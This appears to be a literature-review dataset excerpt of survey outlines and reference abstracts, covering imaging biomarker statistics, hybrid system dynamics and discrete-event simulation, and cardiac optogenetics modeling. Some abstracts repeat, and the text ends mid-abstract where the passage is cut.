Title: Quantitative Imaging Biomarkers: A Review of Statistical Methods for Computer Algorithm Comparisons Section 1: Background and problem statement Description 1: This section introduces the utility of medical imaging in clinical settings and defines quantitative imaging biomarkers, outlining the focus of the paper on computer algorithms used to generate QIBs and the challenges associated with their evaluation and comparison. Section 2: Study design issues for QIB algorithm comparisons Description 2: This section discusses the various design considerations for comparing QIB algorithms, including the types of studies, the importance of selecting appropriate measurement types, and the challenges related to human involvement and lack of true reference values. Section 3: Testing superiority Description 3: This section details the statistical hypothesis testing framework for demonstrating the superiority of a new or upgraded QIB algorithm over a standard algorithm, including one-sided hypothesis tests and confidence interval approaches. Section 4: Testing equivalence Description 4: This section explains the procedures for conducting equivalence tests, where researchers define appropriate equivalence limits to compare the performance of QIB algorithms against predefined thresholds. Section 5: Testing non-inferiority (NI) Description 5: This section describes the methodology for demonstrating that a QIB algorithm is not inferior to a standard method by a predefined margin, often involving a stepwise approach to assess both non-inferiority and superiority. Section 6: Evaluating performance when the true value or reference standard is present Description 6: This section discusses methods for assessing the closeness between QIB algorithm results and true values or reference standards, covering both disaggregated and aggregated approaches to evaluate bias and precision. Section 7: Evaluating performance in the absence of the true value Description 7: This section reviews alternative approaches for assessing algorithm performance when true values are unavailable, including error-in-variable models and techniques that relax certain assumptions. Section 8: Assessing bias with no clear reference standard Description 8: This section considers how to evaluate algorithm performance when no clear reference standard exists, focusing on symmetric consideration of all QIB algorithms under study. Section 9: Nonlinearity and heteroscedasticity Description 9: This section addresses issues of heteroscedasticity and nonlinearity in the relationship between QIB measurements and the true values, and discusses nonparametric methods for dealing with these issues. Section 10: Assessing the agreement among algorithms Description 10: This section explains the methods for assessing whether measurements from different QIB algorithms are sufficiently close to be considered interchangeable, emphasizing both scaled and unscaled measures of agreement. Section 11: Evaluating algorithm precision Description 11: This section discusses methods for comparing the precision of QIB algorithms, including specific indices for repeatability and reproducibility and the appropriate statistical tests for these comparisons. Section 12: Process for establishing the performance of QIB algorithms Description 12: This section outlines a seven-step process for validating the technical performance of QIB algorithms for clinical use or regulatory approval, covering aspects from definition and variability assessment to statistical testing. Section 13: Discussion and recommendations Description 13: This section summarizes the key findings and provides recommendations for future research and development in the field of quantitative imaging biomarkers, emphasizing the importance of rigorous evaluation and validation methods.
COMBINING SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATIONS - OVERVIEW OF HYBRID SIMULATION MODELS
11
--- paper_title: Discrete-event simulation: from the pioneers to the present, what next? paper_content: Discrete-event simulation is one of the most popular modelling techniques. It has developed significantly since the inception of computer simulation in the 1950s, most of this in line with developments in computing. The progress of simulation from its early days is charted with a particular focus on recent history. Specific developments in the past 15 years include visual interactive modelling, simulation optimization, virtual reality, integration with other software, simulation in the service sector, distributed simulation and the use of the worldwide web. The future is then speculated upon. Potential changes in model development, model use, the domain of application for simulation and integration with other simulation approaches are all discussed. The desirability of continuing to follow developments in computing, without significant developments in the wider methodology of simulation, is questioned. --- paper_title: Semiconductor supply network simulation paper_content: More efficient and effective control of supply networks is conservatively worth billions of dollars to the national and world economy. Developing improved control requires simulation of physical flows of materials involved and decision policies governing these flows. We describe our initial work on modelling each of these flows as well as simulating their integration through the synchronized interchange of data. We show the level of abstraction that is appropriate, formulate and test a representative model, and describe our findings and conclusions. --- paper_title: An Approach to a Hybrid Software Process Simulation using the DEVS Formalism paper_content: This article proposes an approach to a hybrid software process simulation modeling (SPSM) using discrete event system specification (DEVS) formalism, which implements the dynamic structure and discrete characteristics of the software development process. Many previous researchers on hybrid SPSM have described both discrete and continuous aspects of the software development process to provide more realistic simulation models. The existing hybrid models, however, have not fully implemented the feedback loop mechanism of the system dynamics. We define the DEVS Hybrid SPSM formalism by extending DEVS to the hybrid SPSM domain. Our hybrid SPSM approach uses system dynamics modeling to convey details concerning activity behaviors and managerial policies, while discrete event modeling controls activity start/completion and sequence. This approach also provides a clear specification, an explicit extension point to extend the simulation model, and a reuse mechanism. We will demonstrate a Waterfall-like hybrid software process simulation model using the DEVS Hybrid SPSM formalism. Copyright  2006 John Wiley & Sons, Ltd. --- paper_title: Discrete-Event System Simulation paper_content: This book provides a basic treatment of one of the most widely used operations research tools: discrete-event simulation. Prerequisites are calculus, probability theory, and elementary statistics. Contents, abridged: Introduction to discrete-event system simulation. Mathematical and statistical models. Random numbers. Analysis of simulation data. Index. --- paper_title: Simulation Modeling and Analysis paper_content: From the Publisher: ::: This second edition of Simulation Modeling and Analysis includes a chapter on "Simulation in Manufacturing Systems" and examples. The text is designed for a one-term or two-quarter course in simulation offered in departments of industrial engineering,business,computer science and operations research. --- paper_title: Comparing Discrete Simulation and System Dynamics: Modeling an Anti-Insurgency Influence Operation paper_content: This paper contrasts the tradeoffs of modeling the same dynamic problem at a micro scale and at a macro scale of analysis: discrete system simulation (DS) versus continuous system simulation or system dynamics (SD). Both are employed to model the influence of entertainment education on terrorist system decay, with implications for field application. Each method optimizes different design, scope/scale, data availability/accuracy, parameter settings, and system sensitivities. Whether the research served by the computer model is applied or theoretical, DS tends to be useful for understand low-level individual unit/step influences on system change over time, whereas SD tends to shine when a wide-angle focus upon sociological/aggregate change is required. --- paper_title: Utilizing simulation to evaluate business decisions in sense-and-respond systems paper_content: Simulation can be an effective way to evaluate alternative decisions in sense-and-respond systems prior to taking actions to resolve existing or anticipated business situations. In sense-and-respond systems, business situations arise within predefined contexts that specify what aspects of the business need to be monitored and what information is needed to make decisions. We have designed a decision support system that dynamically configures simulation models based on business context and interactively presents simulation results to business analysts. In this paper, our decision support system is applied to the IBM demand conditioning process, in which mismatches between supply and demand are identified and corrective actions are initiated. --- paper_title: Enterprise simulation: a hybrid system approach paper_content: Manufacturing enterprise decisions can be classified into four groups: business decisions, design decisions, engineering decisions, and production decisions. Numerous physical and software simulation techniques have been used to evaluate specific decisions by predicting their impact on either system performance or product performance. In this paper, we focus on the impact of production decisions, evaluated using discrete-event-simulation models, on enterprise-level performance measures. We argue that these discrete-event models alone are not enough to capture this impact. To address this problem, we propose integrating discrete-event simulation models with system dynamics models in a hybrid approach to the simulation of the entire enterprise system. This hybrid approach is conceptually consistent with current business trend toward integrated systems. We show the potentials for using this approach through an example of a semiconductor enterprise. --- paper_title: Strategic-Operational Construction Management: Hybrid System Dynamics and Discrete Event Approach paper_content: A significant number of large-scale civil infrastructure projects experience cost overruns and schedule delays. To minimize these disastrous consequences, management actions need to be carefully examined at both the strategic and operational levels, as their effectiveness is mainly dependent on how well strategic perspectives and operational details of a project are balanced. However, current construction project management approaches have treated the strategic and operational issues separately, and consequently introduced a potential conflict between strategic and operational analyses. To address this issue, a hybrid simulation model is presented in this paper. This hybrid model combines system dynamics and discrete event simulation which have mainly been utilized to analyze the strategic and operational issues in isolation, respectively. As an application example, a nontypical repetitive earthmoving process is selected and simulated. The simulation results demonstrate that a systematic integration of strategic perspective and operational details is helpful to enhance the process performance by enabling construction managers to identify potential process improvement areas that traditional approaches may miss. Based on the simulation results, it is concluded that the proposed hybrid simulation model has great potential to support both the strategic and operational aspects of construction project management and to ultimately help increase project performance. --- paper_title: Hybrid System Dynamics and Discrete Event Simulation for Construction Management paper_content: Simulations have significantly contributed to the analysis of construction, and Discrete Event Simulation has been a primary means of simulation focusing on Construction Operation. In this paper, the authors address the importance of Construction Context as another realm for understanding and managing construction through representation of overall behavior of construction associated with Construction Operation. The issues raised from representing both Construction Operation and Construction Context together in a simulation model are discussed, and a hybrid System Dynamics and Discrete Event Simulation approach is proposed as a comprehensive simulation framework for that purpose. Briefly, its application to construction is also discussed. --- paper_title: Applicability of hybrid simulation to different modes of governance in UK healthcare paper_content: Healthcare organizations exhibit both detailed and dynamic complexity. Effective and sustainable decision-making in healthcare requires tools that can comprehend this complexity. Discrete event simulation (DES) due to its ability to capture detail complexity is widely used for operational decision making. However at the strategic level, System Dynamics (SD) with its focus on a holistic perspective and its ability to comprehend dynamic complexity has advantages over DES. Appreciating the complexity of healthcare, the authors have proposed the use of hybrid simulation in healthcare. As argued previously, effective decision making require tools which are capable of comprehending both detail and dynamic interactions of healthcare. The interactions in the organizations are governed by the governance design. In appreciation of that argument the authors have described the applicability of a hybrid approach to various modes of governance in UK healthcare. --- paper_title: MODELING ARCHITECTURE FOR HYBRID SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATION paper_content: Construction systems and projects comprise complex combinations of subsystems, processes, operations, and activities. Discrete Event Simulation (DES) has been used extensively for modeling construction systems, addressing system complexity, and analyzing system behavior. However, while DES is a powerful tool for capturing operations as they occur in reality, DES does have difficulty modeling context and its mutual effects on the operational components of a system. System Dynamics (SD), on the other hand, captures feedback loops that are derived from the context level of a system and that can anticipate system behavior; nevertheless, SD cannot effectively model the operational parts of a system. Hybrid SD and DES modeling provide a set of tools that use the capabilities, while improving upon the disadvantages, of these two approaches. Although initial efforts to develop hybrid SD-DES modeling dates back to the late 1990s, in the construction industry, there are relatively few studies in this area, and there is still no robust architecture for hybrid system developers. This paper addresses these issues by proposing a comprehensive hybrid simulation architecture based on the High Level Architecture (HLA) infrastructure, which can be used by hybrid simulation developers in the construction industry. A typical steel fabrication shop has been modeled based on the proposed architecture, and it has been compared with the ideally developed hybrid simulation architecture. --- paper_title: Hybrid system dynamic—discrete event simulation-based architecture for hierarchical production planning paper_content: Multi-plant production planning problem deals with the determination of type and quantity of products to produce at the plants over multiple time periods. Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based hierarchical production planning architecture consisting of system dynamics (SD) components for the enterprise level planning and discrete event simulation (DES) components for the shop-level scheduling is presented. The architecture consists of the Optimizer, Performance Monitor and Simulator modules at each decision level. The Optimizers select the optimal set of control parameters based on the estimated behaviour of the system. The enterprise-level simulator (SD model) and shop-level simulator (DES model) interact with each other to evaluate the plan. Feedback control loops are employed at each level to monitor the performance and update the control parameters. Functional and process models of the proposed architecture... --- paper_title: Application of a hybrid process simulation model to a software development project paper_content: Abstract Simulation models of the software development process can be used to evaluate potential process changes. Careful evaluation should consider the change within the context of the project environment. While system dynamics models have been used to model the project environment, discrete event and state-based models are more useful when modeling process activities. Hybrid models of the software development process can examine questions that cannot be answered by either system dynamics models or discrete event models alone. In this paper, we present a detailed hybrid model of a software development process currently in use at a major industrial developer. We describe the model and show how the model was used to evaluate simultaneous changes to both the process and the project environment. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Enterprise scheduling: Hybrid and hierarchical issues paper_content: We build a hybrid discrete-continuous simulation model of the manufacturing enterprise system. This model consists of an overall system dynamics model of the manufacturing enterprise and connected to it are a number of discrete event simulations for selected operational and tactical functions. System dynamics modeling best fits the macroscopic nature of activities at the higher management levels while the discrete models best fit the microscopic nature of the operational and tactical levels. An advanced mechanism based on information theory is used for the integration of the different simulation modeling modalities. In addition, the impact of the decisions at the factory level in scheduling are analyzed at the management level. The different models of control are discussed. --- paper_title: Integrating agent-based simulation and system dynamics to support product strategy decisions in the automotive industry paper_content: Especially in the European Union both, regulatory requirements regarding the CO2 emissions of new vehicles and the shortage of crude oil force car manufacturers to introduce alternative fuel and powertrain concepts. Due to high investments and long development times as well as the parallel offer of conventional and alternative technologies, an appropriate product strategy is required. Car manufacturers have to decide, which powertrain to introduce at which time in which vehicle class. Hence, the aim of this paper is to develop a framework for the analysis of product strategies in the automotive industry with special regard to alternative fuel and powertrain technologies. The framework integrates System Dynamics and Agent-based Simulation in a simulation environment. On basis of this analysis recommendations can be deduced concerning the implementation of different product portfolios. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: The high level architecture: is there a better way? paper_content: This paper first discusses the basic design approach adopted for the High Level Architecture and the design goals that it addresses in the military simulation arena. Next, the limitations of this architecture are discussed with particular focus on the real-time information requirements needed to support its operation. Finally, the paper discusses HLA's inability to model complex systems with hierarchical command and control structures and the inherent limitations that this deficiency will impose upon the application of futuristic simulation technologies to military applications. --- paper_title: MODELING ARCHITECTURE FOR HYBRID SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATION paper_content: Construction systems and projects comprise complex combinations of subsystems, processes, operations, and activities. Discrete Event Simulation (DES) has been used extensively for modeling construction systems, addressing system complexity, and analyzing system behavior. However, while DES is a powerful tool for capturing operations as they occur in reality, DES does have difficulty modeling context and its mutual effects on the operational components of a system. System Dynamics (SD), on the other hand, captures feedback loops that are derived from the context level of a system and that can anticipate system behavior; nevertheless, SD cannot effectively model the operational parts of a system. Hybrid SD and DES modeling provide a set of tools that use the capabilities, while improving upon the disadvantages, of these two approaches. Although initial efforts to develop hybrid SD-DES modeling dates back to the late 1990s, in the construction industry, there are relatively few studies in this area, and there is still no robust architecture for hybrid system developers. This paper addresses these issues by proposing a comprehensive hybrid simulation architecture based on the High Level Architecture (HLA) infrastructure, which can be used by hybrid simulation developers in the construction industry. A typical steel fabrication shop has been modeled based on the proposed architecture, and it has been compared with the ideally developed hybrid simulation architecture. --- paper_title: On-line data processing in simulation models: New approaches and possibilities through HLA paper_content: The United States Department of Defense's High Level Architecture for Modeling and Simulation (HLA) provides a standardized interface for distributed simulations. The recent advent of HLA has greatly increased interest in the use of distributed, interoperable simulation model components. This paper focuses on how on-line data (i.e. data from real-time dependent processes) can be used in analytical simulation models and how the use of HLA based components can facilitate the integration of this kind of data into simulations. The paper also discusses the issue of cloning federates and federations and introduces some potential applications of cloning for a public transportation prototype example. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Supply chain and hybrid modeling: The Panama Canal operations and its salinity diffusion paper_content: This paper deals with the simulation modeling of the service supply chain and the salinity and its diffusion in the Panama Canal. An operational supply chain model was created using discrete-event simulation. Once complete, a component based on differential equations was added to the model to investigate the intrusion of salt and the resulting salinity diffusion into the lakes of the canal. This component was implemented in the AnyLogic simulation modeling environment by taking advantage of the concept of hybrid modeling that is embedded in AnyLogic. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: Enterprise simulation: a hybrid system approach paper_content: Manufacturing enterprise decisions can be classified into four groups: business decisions, design decisions, engineering decisions, and production decisions. Numerous physical and software simulation techniques have been used to evaluate specific decisions by predicting their impact on either system performance or product performance. In this paper, we focus on the impact of production decisions, evaluated using discrete-event-simulation models, on enterprise-level performance measures. We argue that these discrete-event models alone are not enough to capture this impact. To address this problem, we propose integrating discrete-event simulation models with system dynamics models in a hybrid approach to the simulation of the entire enterprise system. This hybrid approach is conceptually consistent with current business trend toward integrated systems. We show the potentials for using this approach through an example of a semiconductor enterprise. --- paper_title: Application of a hybrid process simulation model to a software development project paper_content: Abstract Simulation models of the software development process can be used to evaluate potential process changes. Careful evaluation should consider the change within the context of the project environment. While system dynamics models have been used to model the project environment, discrete event and state-based models are more useful when modeling process activities. Hybrid models of the software development process can examine questions that cannot be answered by either system dynamics models or discrete event models alone. In this paper, we present a detailed hybrid model of a software development process currently in use at a major industrial developer. We describe the model and show how the model was used to evaluate simultaneous changes to both the process and the project environment. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: Enterprise simulation: a hybrid system approach paper_content: Manufacturing enterprise decisions can be classified into four groups: business decisions, design decisions, engineering decisions, and production decisions. Numerous physical and software simulation techniques have been used to evaluate specific decisions by predicting their impact on either system performance or product performance. In this paper, we focus on the impact of production decisions, evaluated using discrete-event-simulation models, on enterprise-level performance measures. We argue that these discrete-event models alone are not enough to capture this impact. To address this problem, we propose integrating discrete-event simulation models with system dynamics models in a hybrid approach to the simulation of the entire enterprise system. This hybrid approach is conceptually consistent with current business trend toward integrated systems. We show the potentials for using this approach through an example of a semiconductor enterprise. --- paper_title: Application of a hybrid process simulation model to a software development project paper_content: Abstract Simulation models of the software development process can be used to evaluate potential process changes. Careful evaluation should consider the change within the context of the project environment. While system dynamics models have been used to model the project environment, discrete event and state-based models are more useful when modeling process activities. Hybrid models of the software development process can examine questions that cannot be answered by either system dynamics models or discrete event models alone. In this paper, we present a detailed hybrid model of a software development process currently in use at a major industrial developer. We describe the model and show how the model was used to evaluate simultaneous changes to both the process and the project environment. --- paper_title: Hierarchical production planning using a hybrid system dynamic-discrete event simulation architecture paper_content: Hierarchical production planning provides a formal bridge between long-term plans and short-term schedules. A hybrid simulation-based production planning architecture consisting of system dynamics (SD) components at the higher decision level and discrete event simulation (DES) components at the lower decision level is presented. The need for the two types of simulation has been justified. The architecture consists of four modules: enterprise-level decision maker, SD model of enterprise, shop-level decision maker and DES model of shop. The decision makers select the optimal set of control parameters based on the estimated behavior of the system. These control parameters are used by the SD and DES models to determine the best plan based on the actual behavior of the system. High level architecture has been employed to interface SD and DES simulation models. Experimental results from a single-product manufacturing enterprise demonstrate the validity and scope of the proposed approach. --- paper_title: Enterprise scheduling: Hybrid and hierarchical issues paper_content: We build a hybrid discrete-continuous simulation model of the manufacturing enterprise system. This model consists of an overall system dynamics model of the manufacturing enterprise and connected to it are a number of discrete event simulations for selected operational and tactical functions. System dynamics modeling best fits the macroscopic nature of activities at the higher management levels while the discrete models best fit the microscopic nature of the operational and tactical levels. An advanced mechanism based on information theory is used for the integration of the different simulation modeling modalities. In addition, the impact of the decisions at the factory level in scheduling are analyzed at the management level. The different models of control are discussed. --- paper_title: Towards the holy grail: Combining system dynamics and discrete-event simulation in healthcare paper_content: The idea of combining discrete-event simulation and system dynamics has been a topic of debate in the operations research community for over a decade. Many authors have considered the potential benefits of such an approach from a methodological or practical standpoint. However, despite numerous examples of models with both discrete and continuous parameters in the computer science and engineering literature, nobody in the OR field has yet succeeded in developing a genuinely hybrid approach which truly integrates the philosophical approach and technical merits of both DES and SD in a single model. In this paper we consider some of the reasons for this and describe two practical healthcare examples of combined DES/SD models, which nevertheless fall short of the "holy grail" which has been so widely discussed in the literature over the past decade. --- paper_title: Applicability of hybrid simulation to different modes of governance in UK healthcare paper_content: Healthcare organizations exhibit both detailed and dynamic complexity. Effective and sustainable decision-making in healthcare requires tools that can comprehend this complexity. Discrete event simulation (DES) due to its ability to capture detail complexity is widely used for operational decision making. However at the strategic level, System Dynamics (SD) with its focus on a holistic perspective and its ability to comprehend dynamic complexity has advantages over DES. Appreciating the complexity of healthcare, the authors have proposed the use of hybrid simulation in healthcare. As argued previously, effective decision making require tools which are capable of comprehending both detail and dynamic interactions of healthcare. The interactions in the organizations are governed by the governance design. In appreciation of that argument the authors have described the applicability of a hybrid approach to various modes of governance in UK healthcare. ---
Title: COMBINING SYSTEM DYNAMICS AND DISCRETE EVENT SIMULATIONS - OVERVIEW OF HYBRID SIMULATION MODELS Section 1: INTRODUCTION Description 1: This section introduces the advances in Industrial Engineering, the role of computers in simulation and modelling, and sets the context for combining System Dynamics and Discrete Event Simulation. Section 2: SYSTEM DYNAMICS Description 2: This section explains what System Dynamics (SD) is, its principles, modelling techniques, and the limitations encountered when applying SD in specific scenarios. Section 3: DISCRETE EVENT SIMULATION Description 3: This section discusses Discrete Event Simulation (DES), its principles, the areas of application, and its strengths and weaknesses. Section 4: COMPARISON Description 4: This section provides a comparative analysis between System Dynamics and Discrete Event Simulation, highlighting their differences and suitability for various types of modelling tasks. Section 5: COMBINING TWO MODELLING TECHNIQUES Description 5: This section explores the concept of hybrid models combining SD and DES, including examples of how these hybrid models are applied in different industries and the benefits they offer. Section 6: Area/industry of application Description 6: This section provides specific examples of hybrid models applied in various industries, discussing their design and the problems they solve. Section 7: Type of connection Description 7: This section details how hybrid models are connected, the communication between the models, and the tools and techniques used to integrate them. Section 8: Scope of the hybrid model Description 8: This section addresses the scope of hybrid models, including their application within organizational contexts and specific functional areas. Section 9: Dependent\independent models inside hybrid model Description 9: This section examines whether the models in a hybrid setup are dependent or independent of each other and discusses the practical implications of each scenario. Section 10: Type of hybrid model format Description 10: This section categorizes hybrid models based on their format of communication and integration, and reviews the different approaches taken by various studies. Section 11: EXAMPLE / CASE Description 11: This section presents a specific case study or example of a hybrid model being developed, including the objectives, design, and functioning of the model. Section 12: CONCLUSION Description 12: This section summarizes the key points discussed in the paper, the justification for using hybrid models, and their importance in accurately representing complex real-world scenarios.
Computational modeling of cardiac optogenetics : Methodology overview & review of fi ndings from simulations $
10
--- paper_title: Tachycardia in Post-Infarction Hearts: Insights from 3D Image-Based Ventricular Models paper_content: Ventricular tachycardia, a life-threatening regular and repetitive fast heart rhythm, frequently occurs in the setting of myocardial infarction. Recently, the peri-infarct zones surrounding the necrotic scar (termed gray zones) have been shown to correlate with ventricular tachycardia inducibility. However, it remains unknown how the latter is determined by gray zone distribution and size. The goal of this study is to examine how tachycardia circuits are maintained in the infarcted heart and to explore the relationship between the tachycardia organizing centers and the infarct gray zone size and degree of heterogeneity. To achieve the goals of the study, we employ a sophisticated high-resolution electrophysiological model of the infarcted canine ventricles reconstructed from imaging data, representing both scar and gray zone. The baseline canine ventricular model was also used to generate additional ventricular models with different gray zone sizes, as well as models in which the gray zone was represented as different heterogeneous combinations of viable tissue and necrotic scar. The results of the tachycardia induction simulations with a number of high-resolution canine ventricular models (22 altogether) demonstrated that the gray zone was the critical factor resulting in arrhythmia induction and maintenance. In all models with inducible arrhythmia, the scroll-wave filaments were contained entirely within the gray zone, regardless of its size or the level of heterogeneity of its composition. The gray zone was thus found to be the arrhythmogenic substrate that promoted wavebreak and reentry formation. We found that the scroll-wave filament locations were insensitive to the structural composition of the gray zone and were determined predominantly by the gray zone morphology and size. The findings of this study have important implications for the advancement of improved criteria for stratifying arrhythmia risk in post-infarction patients and for the development of new approaches for determining the ablation targets of infarct-related tachycardia. --- paper_title: Stimulating Cardiac Muscle by Light: Cardiac Optogenetics by Cell Delivery paper_content: Background —After the recent cloning of light-sensitive ion channels and their expression in mammalian cells, a new field, optogenetics, emerged in neuroscience, allowing for precise perturbations of neural circuits by light. However, functionality of optogenetic tools has not been fully explored outside neuroscience; and a non-viral, non-embryogenesis based strategy for optogenetics has not been shown before. ::: ::: Methods and Results —We demonstrate the utility of optogenetics to cardiac muscle by a tandem cell unit (TCU) strategy, where non-excitable cells carry exogenous light-sensitive ion channels, and when electrically coupled to cardiomyocytes, produce optically-excitable heart tissue. A stable channelrhodopsin2 (ChR2) expressing cell line was developed, characterized and used as a cell delivery system. The TCU strategy was validated in vitro in cell pairs with adult canine myocytes (for a wide range of coupling strengths) and in cardiac syncytium with neonatal rat cardiomyocytes. For the first time, we combined optical excitation and optical imaging to capture light-triggered muscle contractions and high-resolution propagation maps of light-triggered electrical waves, found to be quantitatively indistinguishable from electrically-triggered waves. ::: ::: Conclusions —Our results demonstrate feasibility to control excitation and contraction in cardiac muscle by light using the TCU approach. Optical pacing in this case uses less energy, offers superior spatiotemporal control, remote access and can serve not only as an elegant tool in arrhythmia research, but may form the basis for a new generation of light-driven cardiac pacemakers and muscle actuators. The TCU strategy is extendable to (non-viral) stem cell therapy and is directly relevant to in vivo applications. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Methodology for image-based reconstruction of ventricular geometry for patient-specific modeling of cardiac electrophysiology. paper_content: Patient-specific modeling of ventricular electrophysiology requires an interpolated reconstruction of the 3-dimensional (3D) geometry of the patient ventricles from the low-resolution (Lo-res) clinical images. The goal of this study was to implement a processing pipeline for obtaining the interpolated reconstruction, and thoroughly evaluate the efficacy of this pipeline in comparison with alternative methods. The pipeline implemented here involves contouring the epi- and endocardial boundaries in Lo-res images, interpolating the contours using the variational implicit functions method, and merging the interpolation results to obtain the ventricular reconstruction. Five alternative interpolation methods, namely linear, cubic spline, spherical harmonics, cylindrical harmonics, and shape-based interpolation were implemented for comparison. In the thorough evaluation of the processing pipeline, Hi-res magnetic resonance (MR), computed tomography (CT), and diffusion tensor (DT) MR images from numerous hearts were used. Reconstructions obtained from the Hi-res images were compared with the reconstructions computed by each of the interpolation methods from a sparse sample of the Hi-res contours, which mimicked Lo-res clinical images. Qualitative and quantitative comparison of these ventricular geometry reconstructions showed that the variational implicit functions approach performed better than others. Additionally, the outcomes of electrophysiological simulations (sinus rhythm activation maps and pseudo-ECGs) conducted using models based on the various reconstructions were compared. These electrophysiological simulations demonstrated that our implementation of the variational implicit functions-based method had the best accuracy. --- paper_title: Channelrhodopsin-2, a directly light-gated cation-selective membrane channel paper_content: Microbial-type rhodopsins are found in archaea, prokaryotes, and eukaryotes. Some of them represent membrane ion transport proteins such as bacteriorhodopsin, a light-driven proton pump, or channelrhodopsin-1 (ChR1), a recently identified light-gated proton channel from the green alga Chlamydomonas reinhardtii. ChR1 and ChR2, a related microbial-type rhodopsin from C. reinhardtii, were shown to be involved in generation of photocurrents of this green alga. We demonstrate by functional expression, both in oocytes of Xenopus laevis and mammalian cells, that ChR2 is a directly light-switched cation-selective ion channel. This channel opens rapidly after absorption of a photon to generate a large permeability for monovalent and divalent cations. ChR2 desensitizes in continuous light to a smaller steady-state conductance. Recovery from desensitization is accelerated by extracellular H+ and negative membrane potential, whereas closing of the ChR2 ion channel is decelerated by intracellular H+. ChR2 is expressed mainly in C. reinhardtii under low-light conditions, suggesting involvement in photoreception in dark-adapted cells. The predicted seven-transmembrane alpha helices of ChR2 are characteristic for G protein-coupled receptors but reflect a different motif for a cation-selective ion channel. Finally, we demonstrate that ChR2 may be used to depolarize small or large cells, simply by illumination. --- paper_title: Length-dependent tension in the failing heart and the efficacy of cardiac resynchronization therapy paper_content: Aims Cardiac resynchronization therapy (CRT) has emerged as one of the few effective and safe treatments for heart failure. However, identifying patients that will benefit from CRT remains controversial. The dependence of CRT efficacy on organ and cellular scale mechanisms was investigated in a patient-specific computer model to identify novel patient selection criteria. ::: ::: Methods and results A biophysically based patient-specific coupled electromechanics heart model has been developed which links the cellular and sub-cellular mechanisms which regulate cardiac function to the whole organ function observed clinically before and after CRT. A sensitivity analysis of the model identified lack of length dependence of tension regulation within the sarcomere as a significant contributor to the efficacy of CRT. Further simulation analysis demonstrated that in the whole heart, length-dependent tension development is key not only for the beat-to-beat regulation of stroke volume (Frank–Starling 